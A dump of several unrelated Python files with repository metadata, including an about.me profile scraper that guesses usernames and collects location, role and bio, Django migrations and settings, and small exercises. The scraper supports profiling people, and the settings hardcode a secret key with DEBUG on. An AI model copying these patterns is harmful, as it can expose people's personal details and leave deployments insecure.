        self.type = config['plateform']['aboutme']['type']

    # Generate all potential aboutme usernames
    def possible_usernames(self):
        """Return the full candidate profile URL for every permutation."""
        return [self.format.format(permutation=permutation)
                for permutation in self.permutations_list]

    def search(self):
        """Probe every candidate URL and return
        ``{"type": ..., "accounts": [...]}`` with one entry per URL that
        answered HTTP 200, enriched with any profile fields scraped from
        the page.
        """
        aboutme_usernames = {
            "type": self.type,
            "accounts": []
        }

        for username in self.possible_usernames():
            try:
                r = requests.get(username)
            except requests.ConnectionError:
                print("failed to connect to aboutme")
                # Bug fix: without this `continue` the code fell through to
                # `r.status_code` with `r` unbound (NameError on the first
                # iteration) or stale from the previous iteration (wrong
                # account recorded).
                time.sleep(self.delay)
                continue

            # If the account exists
            if r.status_code == 200:
                # Account object
                account = {"value": username}

                # Parse HTML response content with beautiful soup
                soup = BeautifulSoup(r.text, 'html.parser')

                # Scrape the user informations; best-effort — layout changes
                # must not abort the whole search.
                try:
                    user_username = str(soup.find_all(class_="name")[0].get_text()).strip() if soup.find_all(class_="name") else None
                    # NOTE(review): location uses index [1] while the other
                    # fields use [0] — confirm this is intentional.
                    user_location = str(soup.find_all(class_="location")[1].get_text()).strip() if soup.find_all(class_="location") else None
                    user_role = str(soup.find_all(class_="role")[0].get_text()).strip() if soup.find_all(class_="role") else None
                    user_description = str(soup.find_all(class_="short-bio")[0].get_text()).strip() if soup.find_all(class_="short-bio") else None

                    account["username"] = {"name": "Username", "value": user_username}
                    account["location"] = {"name": "Location", "value": user_location}
                    account["role"] = {"name": "Role", "value": user_role}
                    account["description"] = {"name": "Description", "value": user_description}
                except Exception:
                    # Was a bare `except:`; narrowed so Ctrl-C etc. still work.
                    pass

                # Append the account to the accounts table
                aboutme_usernames["accounts"].append(account)

            time.sleep(self.delay)

        return aboutme_usernames
|
[
"dholpuria1999@gmail.com"
] |
dholpuria1999@gmail.com
|
b984fb235fc1f22cab5e15b05e2537f216c487fc
|
135277eba35389ad416b5da450781570b849d3f4
|
/ABCcompany/eventos/migrations/0001_initial.py
|
6638deb3d2e1aed2dadbd29de1e5d4aaa7ad0daa
|
[] |
no_license
|
AlejandroValenciaR/ProyectoWWW-Despliegue
|
d1f7740a398f1fc97d0ab730c189a763f61d7bdd
|
7cf71a7e76b757d74c110545fe17fa65d4023017
|
refs/heads/master
| 2021-08-30T01:06:10.036533
| 2017-12-15T13:27:51
| 2017-12-15T13:27:51
| 114,314,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,290
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-16 21:56
from __future__ import unicode_literals
from django.conf import settings
import django.core.files.storage
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial schema for the ``eventos`` app: activities, events,
    registrations (plus operator validation), news posts and user profiles.

    Auto-generated by Django 1.11.6 — applied migrations should not be
    hand-edited.
    """

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Activity: a named time slot; linked to its Evento by the AddField
        # at the end of this migration.
        migrations.CreateModel(
            name='Actividad',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nombre', models.CharField(max_length=200)),
                ('descripcion', models.TextField()),
                ('estado', models.BooleanField()),
                ('fecha_creacion', models.DateTimeField(default=django.utils.timezone.now)),
                ('hora_inicio', models.TimeField()),
                ('hora_fin', models.TimeField()),
            ],
        ),
        # Event: dates/times, location and a banner image stored under the
        # app's static img directory.
        migrations.CreateModel(
            name='Evento',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nombre', models.CharField(max_length=200)),
                ('fecha_creacion', models.DateTimeField(default=django.utils.timezone.now)),
                ('fecha_inicio', models.DateField()),
                ('Hora_inicio', models.TimeField(default='00:00')),
                ('fecha_fin', models.DateField()),
                ('Hora_fin', models.TimeField(default='00:00')),
                ('estado', models.BooleanField()),
                ('ubicacion', models.CharField(max_length=200)),
                ('banner', models.ImageField(default='static/eventos/dist/img/avatar.png', storage=django.core.files.storage.FileSystemStorage(location='eventos/static/eventos/dist/img/imgevents/'), upload_to=b'')),
                ('descripcion', models.CharField(default='No hay descripcion', max_length=10000)),
            ],
        ),
        # Registration of a user for an event.
        migrations.CreateModel(
            name='Inscripcion',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('fecha_inscripcion', models.DateTimeField(default=django.utils.timezone.now)),
                ('estado', models.BooleanField()),
                ('evento', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eventos.Evento')),
                ('inscrito', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Operator validation record for a registration.
        migrations.CreateModel(
            name='Inscripcion_operador',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('fecha_validacion', models.DateTimeField(default=django.utils.timezone.now)),
                ('inscripcion', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eventos.Inscripcion')),
                ('operador', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # News post tied to an event and its author.
        migrations.CreateModel(
            name='Noticia',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nombre', models.CharField(max_length=200)),
                ('fecha_creacion', models.DateTimeField(default=django.utils.timezone.now)),
                ('fecha_publicacion', models.DateTimeField()),
                ('contenido', models.TextField()),
                ('estado', models.BooleanField()),
                ('autor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
                ('evento', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eventos.Evento')),
            ],
        ),
        # One-to-one user profile with contact details.
        migrations.CreateModel(
            name='Perfiles',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('cedula', models.BigIntegerField()),
                ('nombre', models.CharField(max_length=100)),
                ('celular', models.BigIntegerField()),
                ('telefono', models.BigIntegerField()),
                ('email', models.EmailField(max_length=254)),
                ('direccion', models.CharField(max_length=200)),
                ('pais', models.CharField(max_length=200)),
                ('ciudad', models.CharField(max_length=200)),
                ('sexo', models.CharField(default='N', max_length=2)),
                ('tipo', models.CharField(max_length=30)),
                ('session', models.CharField(default='0', max_length=1)),
                ('usuario', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.AddField(
            model_name='actividad',
            name='evento',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eventos.Evento'),
        ),
    ]
|
[
"valencia.alejandro@correounivalle.edu.co"
] |
valencia.alejandro@correounivalle.edu.co
|
ada8a0fc4c3f798ca5a43eea5f8d3042918d428a
|
0ba1743e9f865a023f72a14d3a5c16b99ee7f138
|
/problems/test_0094_morris.py
|
fb7cea13d160e24ccdea5308098435effd0b0aaa
|
[
"Unlicense"
] |
permissive
|
chrisxue815/leetcode_python
|
d0a38a4168243b0628256825581a6df1b673855c
|
a33eb7b833f6998972e5340d383443f3a2ee64e3
|
refs/heads/main
| 2022-06-20T15:09:27.221807
| 2022-06-02T21:55:35
| 2022-06-02T21:55:35
| 94,590,264
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,238
|
py
|
import unittest
from typing import List
import utils
from tree import TreeNode
def _find_predecessor(curr):
p = curr.left
if not p:
return None
while p.right and p.right is not curr:
p = p.right
return p
# O(n) time. O(1) space. Morris in-order traversal.
# O(n) time. O(1) space. Morris in-order traversal.
class Solution:
    def inorderTraversal(self, root: TreeNode) -> List[int]:
        """Morris in-order traversal: no stack, no recursion.

        Each node's in-order predecessor temporarily gets its right pointer
        threaded back to the node, so the walk can return from the left
        subtree without extra memory; the thread is removed on the second
        visit, restoring the tree.
        """
        result = []
        curr = root
        while curr:
            p = _find_predecessor(curr)
            if p:
                if p.right:
                    # Second visit: the thread exists, so the left subtree
                    # is finished. Emit curr, unthread, move right.
                    result.append(curr.val)
                    p.right = None
                    curr = curr.right
                else:
                    # First visit: create the thread and descend left.
                    p.right = curr
                    curr = curr.left
            else:
                # No left subtree: emit and move right.
                result.append(curr.val)
                curr = curr.right
        return result
class Test(unittest.TestCase):
    def test(self):
        """Run every case from the sibling JSON fixture through the solution."""
        cases = utils.load_test_json(__file__).test_cases
        for case in cases:
            args = str(case.args)
            root = TreeNode.from_array(case.args.root)
            actual = Solution().inorderTraversal(root)
            self.assertEqual(case.expected, actual, msg=args)


if __name__ == '__main__':
    unittest.main()
|
[
"chrisxue815@gmail.com"
] |
chrisxue815@gmail.com
|
852b88ba81716981f09e0de47c7e45d2e8cb4f9b
|
fcce37f4e27c3a61573b93247dd35cea8642d0d9
|
/product/migrations/0012_auto_20210203_1045.py
|
d74ab5bf89a18eac9f504e6704cbd104a53e34ca
|
[] |
no_license
|
olayiwolaA/Dropshipping-e-commercial-website
|
813deffde03e3a89ce43de0778743abd64472464
|
2ff202c54409986acd118758be564a7c4795d195
|
refs/heads/master
| 2023-03-30T15:37:21.983625
| 2021-03-19T05:09:25
| 2021-03-19T05:09:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 634
|
py
|
# Generated by Django 3.0.11 on 2021-02-03 03:45
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Order comments chronologically and add a self-referential ``parent``
    FK so comments can have threaded replies (reverse name ``replies``).

    Auto-generated by Django; applied migrations should not be hand-edited.
    """

    dependencies = [
        ('product', '0011_slider'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='comment',
            options={'ordering': ('create_at',)},
        ),
        migrations.AddField(
            model_name='comment',
            name='parent',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='replies', to='product.Comment'),
        ),
    ]
|
[
"59214516+miatran1109@users.noreply.github.com"
] |
59214516+miatran1109@users.noreply.github.com
|
5b30f0bc4e29e549e6d4270326a55defe2e385f0
|
0d7269e8f02d8a234c092bfda91d9f44fe670d2e
|
/w7-d5-docker/api.py
|
abb3d64a5dc26da4a01df753f1a0a18e0ce5ed6d
|
[] |
no_license
|
Hermenegildo12/Apuntes-Clases
|
e2a0ded9459a61209ab884548926d941da1eb2da
|
4cf51bcec494001336607da00f6c555c3691dc18
|
refs/heads/master
| 2020-08-09T17:21:14.617496
| 2019-10-10T08:08:15
| 2019-10-10T08:08:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 496
|
py
|
from bottle import route, run, template
import random
def randomName():
    """Draw one of the three hard-coded names at random, log it to the
    console, and return it."""
    candidates = ["Pepe", "Juan", "Antonio"]
    chosen = random.choice(candidates)
    print("El nombre es {}".format(chosen))
    return chosen
@route('/')
def index():
    """Root endpoint: logs and returns a static JSON payload."""
    print("hola")
    return {"hola": "que tal"}


@route('/random')
def imprimeNombreRandom():
    """Return a freshly drawn random name on every request."""
    return {"name": randomName()}


# Drawn once at import time, so /onlyone returns the same name for the
# lifetime of the process.
configuredName = randomName()


@route('/onlyone')
def imprimeNombreRandom2():
    """Return the name fixed at startup."""
    return {"name": configuredName}


# Bottle's built-in dev server; listens on all interfaces (blocking call).
run(host='0.0.0.0', port=8080)
|
[
"marc@faable.com"
] |
marc@faable.com
|
2f851e10a4a8ac7f3fec110a2c904089aa26c811
|
72af02a089d3c62b871ce44960c53469566486a8
|
/apis/serializers.py
|
a853c26a9f02cb602e643c326d70b0861b7acb85
|
[] |
no_license
|
marahnairat/e-commerce
|
20f1be8142f52420a4ccdc81f9d64bd275fa394b
|
bbfa6842ade5f75c30bdac0374b1fe6e06bf89f4
|
refs/heads/master
| 2023-01-21T11:49:22.043488
| 2020-11-29T16:00:13
| 2020-11-29T16:00:13
| 316,985,829
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 310
|
py
|
from rest_framework import serializers
# import model from models.py
from .models import GeeksModel
# Create a model serializer
class GeeksSerializer(serializers.HyperlinkedModelSerializer):
    """DRF serializer for GeeksModel, exposing only title and description."""

    class Meta:
        model = GeeksModel
        fields = ('title', 'description')
|
[
"48821626+marahnairat@users.noreply.github.com"
] |
48821626+marahnairat@users.noreply.github.com
|
3140159f5d061f4a6d4a188a48db47489af2e417
|
458b1133df5b38a017f3a690a624a54f0f43fda7
|
/PaperExperiments/XHExp519/parameters.py
|
fd1677d3c8ae19cf862191018452b01ffa4bd8f3
|
[
"MIT"
] |
permissive
|
stefan-c-kremer/TE_World2
|
9c7eca30ee6200d371183c5ba32b3345a4cc04ee
|
8e1fae218af8a1eabae776deecac62192c22e0ca
|
refs/heads/master
| 2020-12-18T14:31:00.639003
| 2020-02-04T15:55:49
| 2020-02-04T15:55:49
| 235,413,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,621
|
py
|
# parameters.py
"""
Exp 519 - {'Initial_genes': '500', 'Host_mutation_rate': '0.03', 'TE_progeny': '0.00, 0, 0.55, 1, 0.30, 2, 0.15, 3', 'TE_Insertion_Distribution': 'Flat()', 'Carrying_capacity': '30', 'TE_excision_rate': '0.5', 'Junk_BP': '1.4', 'Gene_Insertion_Distribution': 'Flat()', 'mutation_effect': '0.01', 'TE_death_rate': '0.0005'}
"""
from TEUtil import *;
# note that "#" indicates a comment
# set the following to True if you want messages printed to the screen
# while the program runs - search for these keywords in TESim.py to see
# what each one prints out
# Per-topic console logging switches; keys are matched by name in TESim.py.
output = {
    "SPLAT": False,
    "SPLAT FITNESS": False,
    "INITIALIZATION": False,
    "GENERATION": True,
    "HOST EXTINCTION": True,
    "TE EXTINCTION": True,
    "TRIAL NO": True,
    "GENE INIT": False,
    "TE INIT": False,
};

# Where new TEs / genes land along the genome (see note below).
TE_Insertion_Distribution = Flat();
Gene_Insertion_Distribution = Flat();
# Triangle( pmax, pzero ) generates values between pmax and pzero with
# a triangular probability distribution, where pmax is the point of highest
# probability, and pzero is the point of lowest probability
# - you can change the orientation of the triangle by reversing the values
# of pmax and pzero
# Flat() generates values between 0 and 1 with uniform probability

Gene_length = 1000;  # use 1000?
TE_length = 1000;  # use 1000?
TE_death_rate = 0.0005;
TE_excision_rate = 0.5;  # set this to zero for retro transposons
# for retro transposons this is the probability of the given number of progeny
# for dna transposons this is the probability of the given number of progeny
# ___PLUS___ the original re-inserting
# (alternating probability, value pairs: 0% -> 0, 55% -> 1, 30% -> 2, 15% -> 3)
TE_progeny = ProbabilityTable( 0.00, 0, 0.55, 1, 0.30, 2, 0.15, 3 );

Initial_genes = 500;

Append_gene = True;  # True: when the initialization routine tries to place
                     # a gene inside another gene, it instead appends it
                     # at the end of the original gene (use this with small
                     # amounts of Junk_BP).
                     # False: when the initialization routine tries to place
                     # a gene inside another gene, try to place it somewhere
                     # else again (don't use this option with small amounts
                     # of Junk_BP).

Initial_TEs = 1;
MILLION = 1000000;
Junk_BP = 1.4 * MILLION;

Host_start_fitness = 1.0;
Host_mutation_rate = 0.03;
# Effect of a host mutation on fitness: 40% lethal, 30% deleterious
# (up to -0.01), 15% neutral, 15% beneficial (up to +0.01).
Host_mutation = ProbabilityTable( 0.40, lambda fit: 0.0,
                                  0.30, lambda fit: fit - random.random()*0.01,
                                  0.15, lambda fit: fit,
                                  0.15, lambda fit: fit + random.random()*0.01
                                  );

# what happens when a TE hits a gene
Insertion_effect = ProbabilityTable(0.30, lambda fit: 0.0,
                                    0.20, lambda fit: fit - random.random()*0.01,
                                    0.30, lambda fit: fit,
                                    0.20, lambda fit: fit + random.random()*0.01
                                    );

Carrying_capacity = 30;
Host_reproduction_rate = 1;  # how many offspring each host has
Host_survival_rate = lambda propfit: min( Carrying_capacity * propfit, 0.95 );
# propfit = proportion of fitness owned by this individual

Maximum_generations = 1500;
Terminate_no_TEs = True;  # end simulation if there are no TEs left

# seed = 0;
seed = None;  # if seed = None, the random number generator's initial state is
              # set "randomly"

save_frequency = 50;  # Frequency with which to save state of experiment
saved = None;  # if saved = None then we start a new simulation from scratch
               # if saved = string, then we open that file and resume a simulation
|
[
"stefan@kremer.ca"
] |
stefan@kremer.ca
|
41288e7817a58ec0db1f90d9669ca3c7bb66f47d
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/pg_2323+049/sdB_pg_2323+049_coadd.py
|
353e65f7e87003087591089f987512c08696bbea
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 429
|
py
|
from gPhoton.gMap import gMap
def main():
    """Build NUV count and coadd maps for sdB PG 2323+049 with gPhoton.

    skypos is RA/Dec in degrees, skyrange a square of 0.0333... deg
    (2 arcmin) per side, stepsz the time-bin size in seconds.
    NOTE(review): cntfile is written under .../LIGHTCURVES/sdBs/... while
    cntcoaddfile goes under .../LIGHTCURVES/sdB/... — confirm the differing
    parent directories are intentional.
    """
    gMap(band="NUV", skypos=[351.527458,5.271081], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_pg_2323+049/sdB_pg_2323+049_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_pg_2323+049/sdB_pg_2323+049_count_coadd.fits", overwrite=True, verbose=3)

if __name__ == "__main__":
    main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
a7ce4d598ae0cebc4ab35db71bf5a1a5e34a7eb4
|
3c988068cad8cf323b1f51ec81570c244341b0d3
|
/MxOnline/urls.py
|
a1294a28e19179e70854f0cd5e3157ef25f6971a
|
[] |
no_license
|
framelei/MxOnline
|
68ad16898890699bf5a2574fa957ab2ea12a6622
|
a6e05db44fc15a0e0ab0498483ee74af69b674a3
|
refs/heads/master
| 2020-04-14T16:49:45.106566
| 2019-01-03T10:59:10
| 2019-01-03T10:59:10
| 163,962,533
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,213
|
py
|
#_*_ encoding:utf-8 _*_
"""MxOnline URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, url
2. Add a URL to urlpatterns: url('blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
import xadmin
from django.views.static import serve
from MxOnline.settings import MEDIA_ROOT
from django.urls import path,include,re_path
from django.views.generic import TemplateView
from users.views import LoginView,RegisterView,ActiveUserView,ForgetPwdView,ResetView,ModifyPwdView,LogoutView
from organization.views import OrgView
urlpatterns = [
    path('xadmin/', xadmin.site.urls),
    # Site index, rendered straight from the template with no view logic.
    path('', TemplateView.as_view(template_name='index.html'), name='index'),
    # url('login/',views.user_login,name = 'login'),  # old function view, replaced by class-based LoginView below
    path('login/', LoginView.as_view(), name='login'),
    path('logout/', LogoutView.as_view(), name="logout"),
    path('register/', RegisterView.as_view(), name='register'),
    path('captcha/', include('captcha.urls')),
    # Account activation link (active_code is the emailed token).
    re_path('active/(?P<active_code>.*)/', ActiveUserView.as_view(), name='user_active'),
    path('forget/', ForgetPwdView.as_view(), name='forget_pwd'),
    re_path('reset/(?P<active_code>.*)/', ResetView.as_view(), name='reset_pwd'),
    path('modify_pwd/', ModifyPwdView.as_view(), name='modify_pwd'),
    # Serve uploaded images with Django's built-in `serve` view, rooted at
    # the configured MEDIA_ROOT (dev convenience).
    re_path(r'^media/(?P<path>.*)', serve, {"document_root": MEDIA_ROOT }),
    # Course-organization URL configuration
    path('org/', include('organization.urls', namespace='org')),
    path("course/", include('course.urls', namespace="course")),
    # Personal profile center
    path("users/", include('users.urls', namespace="users")),
]
|
[
"602009841@qq.com"
] |
602009841@qq.com
|
60d8c7a968a5927d299d221191f33054a11432cf
|
3a78155868c1f0d2e524caaf569545df0ff15198
|
/actions/utils.py
|
42433cbdd9d7fd486cbd362c034edcdd2ae22b41
|
[] |
no_license
|
yasharabbaslo/Social-Network
|
aad7c3393634b4c324afe83dd72697620079f752
|
2c2de4f710d686b55775881c1b767918622921ad
|
refs/heads/master
| 2022-12-11T02:26:45.664834
| 2020-02-12T07:34:24
| 2020-02-12T07:34:24
| 237,016,904
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 772
|
py
|
import datetime
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from .models import Action
def create_action(user, verb, target=None):
    """Record *verb* as an Action for *user*, unless an identical action
    (same user, verb and optional target) was already created within the
    last minute.

    Returns True when a new Action row was saved, False when the action
    was deduplicated away.
    """
    one_minute_ago = timezone.now() - datetime.timedelta(seconds=60)
    duplicates = Action.objects.filter(user_id=user.id, verb=verb,
                                       created__gte=one_minute_ago)
    if target:
        target_ct = ContentType.objects.get_for_model(target)
        duplicates = duplicates.filter(target_ct=target_ct, target_id=target.id)
    if duplicates:
        return False
    new_action = Action(user=user, verb=verb, target=target)
    new_action.save()
    return True
|
[
"yashar.abbaslo@gmail.com"
] |
yashar.abbaslo@gmail.com
|
e012ed501e1ccdfa43db999e6ac4bc794bd075a2
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_199/2436.py
|
e0b05342601ef60ae06d1406be5647373b3e4075
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,056
|
py
|
def flip(line, start, count):
    """Return *line* with *count* characters flipped starting at *start*:
    each '-' becomes '+', any other character becomes '-'.

    Improvements over the original: the per-character slicing rebuilt the
    whole string once per flipped character (O(len*count)); this builds the
    flipped segment with one join. It also no longer raises IndexError when
    start+count runs past the end of the string (the slice just stops).
    """
    segment = line[start:start + count]
    flipped = "".join("+" if ch == "-" else "-" for ch in segment)
    return line[:start] + flipped + line[start + count:]
def flipcount(line, size):
    """Count the width-*size* flips needed to turn *line* into all '+'.

    Greedy left-to-right: flip at the leftmost '-'. Returns the string
    "IMPOSSIBLE" (note: not an exception) when a '-' is too close to the
    end for the flipper to cover it.
    """
    counter = 0;
    i = 0
    temp = line
    while(i < len(line)):
        if(line[i] == '-'):
            # rem > size  <=>  len(line) - i >= size, i.e. the flipper fits.
            rem = len(line) - i + 1
            if(rem > size):
                line = flip(line, i, size);
            else:
                return "IMPOSSIBLE"
            #print line
            # Rescan from the left after every flip (correct but O(n^2)).
            i = 0
            counter = counter + 1
            # NOTE(review): `temp` is never updated and flip() always changes
            # the flipped span, so this guard appears unreachable.
            if(line == temp):
                return "IMPOSSIBLE"
        elif(line[i] == '+'):
            i = i + 1
    return counter
# Python 2 driver: read T test cases, each "<pancake string> <flipper size>".
t = int(raw_input())
l = []
z = []
x = 0
while(x < t):
    p, q = raw_input().split()
    l.append(p)
    q = int(q)
    z.append(q)
    x = x + 1
x = 0
while(x < t):
    ans = str(flipcount(l[x], z[x]))
    # NOTE(review): Code Jam judges expect "Case #%d: ..." with a capital C;
    # this lowercase "case" would be rejected. (String left as-is.)
    print "case #%d: %s" % (x+1, ans)
    x = x + 1
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
8f0642e242649e92712114efe54aa90f770a5afd
|
b5d87a5a7f74147754fc933e21e347f083f9923b
|
/algo/verkefni 2/10_challenge_find_eulerian_tour.py
|
6765ffa89d6dc0ed7a60838ca67e8c8159bba6e4
|
[] |
no_license
|
GunnarThorunnarson/2018-vor
|
4604e45b20280258a18de6210e6109174dcf564e
|
29a5830b83aa02c30822c23493db876897f29244
|
refs/heads/master
| 2021-04-06T05:33:55.856688
| 2018-02-23T14:11:29
| 2018-02-23T14:11:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 613
|
py
|
# Find Eulerian Tour
#
# Write a function that takes in a graph
# represented as a list of tuples
# and return a list of nodes that
# you would follow on an Eulerian Tour
#
# For example, if the input graph was
# [(1, 2), (2, 3), (3, 1)]
# A possible Eulerian tour would be [1, 2, 3, 1]
def find_eulerian_tour(graph):
    """Return an Eulerian tour of the undirected (multi)graph given as a
    list of (u, v) edge tuples, as the list of visited nodes — first node
    equals last, and every edge is used exactly once.

    Implements Hierholzer's algorithm in O(E). Assumes, per the exercise
    statement, that a tour exists (connected graph, all degrees even).
    Returns [] for an empty edge list. (The original was an unimplemented
    stub that always returned [].)
    """
    if not graph:
        return []

    # Adjacency lists; each undirected edge appears in both endpoints' lists.
    adjacency = {}
    for u, v in graph:
        adjacency.setdefault(u, []).append(v)
        adjacency.setdefault(v, []).append(u)

    tour = []
    stack = [graph[0][0]]
    while stack:
        node = stack[-1]
        if adjacency[node]:
            # Follow (and consume) any remaining edge out of `node`.
            neighbor = adjacency[node].pop()
            adjacency[neighbor].remove(node)
            stack.append(neighbor)
        else:
            # All edges at `node` used: emit it while backtracking.
            tour.append(stack.pop())
    return tour
def test_tour(graph, tour):
t = tour
g = graph
a = None
b = None
while len(t) > 2:
a = t.pop(0)
b = t[0]
# print(a, "->", b)
a = t.pop(0)
b = t.pop(0)
print (a, " -> ", b)
test_tour([], [1, 2, 3, 4])
|
[
"neptunus@hirt.is"
] |
neptunus@hirt.is
|
d957238cbd637abd675ff3ee440421189d23e6f5
|
19e8fcfa0ad0a4462a3ee88a6e18506284bbc963
|
/rango/migrations/0006_category_slug.py
|
c05486e3964de6d48bd595f5e76ce935811bc6b7
|
[] |
no_license
|
YanSym/tangowithdjango
|
c29fe31b0a67fa88832191912f94547551a4eb9a
|
c0f9785f278e9ac833bf23deecae3bb90d9eac1c
|
refs/heads/master
| 2021-01-22T09:48:15.667370
| 2015-03-11T13:46:04
| 2015-03-11T13:46:04
| 29,487,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 437
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Re-add the ``slug`` field to Category (removed in 0005), backfilling
    existing rows with 'temp'. Auto-generated; avoid hand-editing applied
    migrations.
    """

    dependencies = [
        ('rango', '0005_remove_category_slug'),
    ]

    operations = [
        migrations.AddField(
            model_name='category',
            name='slug',
            field=models.SlugField(default='temp'),
            # 'temp' is only the one-off backfill value, not a model default.
            preserve_default=False,
        ),
    ]
|
[
"yan.vsym1@gmail.com"
] |
yan.vsym1@gmail.com
|
73fd8c964d09188d6db73287316cf1a31ef99828
|
cc0b6c03303ac30a147e0a6748bf716d098bec21
|
/tree/tree/settings.py
|
d7e17c4e2e65a61d77247fffb1db754e91caeb98
|
[] |
no_license
|
aronasorman/django-project
|
59f18b29beaa104f5fb7bf8756298f68fa13f37a
|
b3e46b9fe3746ab9a77d893d31f1dd4f15bb83f7
|
refs/heads/master
| 2020-12-30T19:58:17.105159
| 2014-02-10T06:35:10
| 2014-02-10T06:35:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,262
|
py
|
"""
Django settings for tree project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Project root: two levels up from this settings module.
BASE_DIR = os.path.dirname(os.path.dirname(__file__))

# Bug fix: the trailing comma is required — without it the parentheses are
# mere grouping and TEMPLATE_DIRS was a plain *string*, not a tuple of dirs.
TEMPLATE_DIRS = (
    os.path.join(BASE_DIR, 'template'),
)

# Filesystem location and URL prefix for user-uploaded media.
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = "/media/"
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 't9^-#o&4y98y-6xby(-an#f69$)s6ks-hsea$1msej3ygr-q5k'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

TEMPLATE_DEBUG = True

# Empty list: when DEBUG is False no host is served until this is filled in.
ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
)

MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)

# Filesystem template dirs are searched first, then each app's templates/.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    #django.template.loaders.eggs.Loader',
)

ROOT_URLCONF = 'tree.urls'

WSGI_APPLICATION = 'tree.wsgi.application'


# Database
